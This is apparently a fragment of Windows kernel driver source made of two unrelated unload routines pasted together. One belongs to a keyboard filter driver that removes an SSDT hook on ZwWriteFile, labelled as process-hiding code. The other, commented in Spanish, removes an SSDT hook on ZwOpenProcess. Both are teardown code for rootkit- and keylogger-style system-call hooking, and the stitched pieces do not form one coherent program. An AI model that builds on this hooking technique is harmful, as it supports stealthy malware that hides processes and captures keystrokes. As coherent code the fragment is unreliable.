VOID
Unload(
IN PDRIVER_OBJECT pDriverObject
)
{
// Local variables
KTIMER timer; // timer to wait for IRPs to die
LARGE_INTEGER timeout; // timeout for the timer
PDEVICE_EXTENSION pKeyboardDeviceExtension;
DbgPrint("Begin DriverUnload routine.\n");
// Get the pointer to the device extension
pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;
// Detach from the device underneath that we're hooked to
IoDetachDevice(pKeyboardDeviceExtension->pKeyboardDevice);
//***Begin HideProcessHookMDL SSDT hook code***
// Unhook SSDT call, disable interrupts first
_asm{cli}
UNHOOK_SYSCALL(ZwWriteFile, OldZwWriteFile, NewZwWriteFile);
_asm{sti}
// Unlock and free MDL
if(g_pmdlSystemCall)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
//*** End HideProcessHookMDL SSDT hook code***
// Initialize a timer
timeout.QuadPart = 1000000;
KeInitializeTimer(&timer);
// Wait for pending IRPs to finish
while (numPendingIrps > 0)
{
KeSetTimer(&timer, timeout, NULL);
KeWaitForSingleObject(&timer, Executive, KernelMode, FALSE, NULL);
}
// Delete the device
IoDeleteDevice(pDriverObject->DeviceObject);
//TODO: clean up any remaining resources, close any files, etc..
// Done.
return;
} // Unload
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("Descargando driver...");
//Unhookeamos
UNHOOK_SYSCALL( ZwOpenProcess, ZwOpenProcessIni, NewZwOpenProcess );
//Eliminamos la MDL
if(g_pmdlSystemCall)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
}
